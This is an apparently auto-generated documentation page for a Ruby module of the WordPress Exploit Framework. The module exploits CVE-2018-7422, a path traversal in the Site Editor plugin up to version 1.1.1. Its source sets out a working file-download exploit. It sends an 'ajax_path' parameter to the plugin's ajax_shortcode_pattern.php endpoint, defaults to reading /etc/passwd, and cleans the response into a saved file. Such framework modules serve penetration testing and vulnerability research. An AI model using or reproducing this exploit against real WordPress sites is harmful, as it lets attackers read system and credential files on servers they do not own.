class Wpxf::Auxiliary::SiteEditorFileDownload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 6 def initialize super update_info( name: 'Site Editor <= 1.1.1 File Download', desc: %( This module exploits a vulnerability which allows you to download any non-PHP file accessible by the user the web server is running as. ), author: [ 'Nicolas Buzy-Debat', # Disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2018-7422'], ['WPVDB', '9044'] ], date: 'Mar 16 2018' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 28 def check check_plugin_version_from_readme('site-editor', '1.1.2') end
default_remote_file_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 32 def default_remote_file_path '/etc/passwd' end
download_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 50 def download_request_params { 'ajax_path' => remote_file } end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 40 def downloader_url normalize_uri(wordpress_url_plugins, 'site-editor', 'editor', 'extensions', 'pagebuilder', 'includes', 'ajax_shortcode_pattern.php') end
validate_content(content)
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload#validate_content
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 44 def validate_content(content) pattern = /{"success":true,"data":{"output":\[\]}}$/ File.write(downloaded_filename, content.gsub(pattern, '')) super end
working_directory()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 36 def working_directory 'wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/' end